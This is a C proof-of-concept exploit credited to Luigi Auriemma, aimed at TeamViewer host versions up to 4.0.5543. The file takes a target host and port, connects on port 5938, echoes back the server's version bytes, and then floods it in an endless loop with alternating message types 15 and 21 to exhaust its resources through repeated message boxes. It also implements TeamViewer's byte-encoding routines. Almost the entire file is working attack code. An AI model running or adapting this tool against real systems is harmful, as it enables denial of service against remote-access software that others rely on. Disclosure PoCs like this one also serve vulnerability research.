/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        5938
#define BUFFSZ      0x8000  // max supported by teamviewer



void teamviewer_encode(u8 *data, int len);
void teamviewer_decode(u8 *data, int len);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    struct  linger  ling = {1,1};
    int     sd,
            i,
            len,
            slen    = 0;
    u16     port    = PORT;
    u8      *buff,
            ver1,
            ver2;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "TeamViewer host <= 4.0.5543 resources consumption "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port]\n"
            "\n", argv[0]);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    // there are various null pointers with types like 10 and 11 but they don't affect the execution of the server

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    if(setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling))
      < 0) std_err();

    if(recv(sd, &ver1, 1, 0) != 1) goto quit;
    if(recv(sd, &ver2, 1, 0) != 1) goto quit;
    len = recv(sd, buff, BUFFSZ, 0);    // basic recv without handling of the protocol
    if(len <= 0) goto quit;

    for(i = 0;; i++) {
        if(!(i & 15)) printf("%d\r", i);
        buff[0] = ver1;
        buff[1] = ver2;
        buff[2] = (i & 1) ? 15 : 21;    // alternate the types which cause the messagebox
        *(u16 *)(buff + 3) = slen;
        if(send(sd, buff, 5, 0) != 5) break;

        if(slen) {  // not needed in this PoC
            memset(buff, i, slen);
            teamviewer_encode(buff, slen);
            if(send(sd, buff, slen, 0) != slen) break;
        }
    }

quit:
    close(sd);
    printf("- connection lost\n");
    return(0);
}



void teamviewer_encode(u8 *data, int len) {
    int     i;
    u8      a,
            c;

    a = data[0] & 1;
    for(i = 0; i < len; i++) {
        c = data[i];
        data[i] = c >> 1;
        if(i > 0) data[i] |= a << 7;
        a = c & 1;
    }
    data[0] |= a << 7;
}



void teamviewer_decode(u8 *data, int len) {
    int     i;
    u8      a,
            c;

    len--;
    a = data[0] & 0x80;
    for(i = len; i >= 0; i--) {
        c = data[i];
        data[i] = c << 1;
        if(i < len) data[i] |= a >> 7;
        a = c & 0x80;
    }
    data[len] |= a >> 7;
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


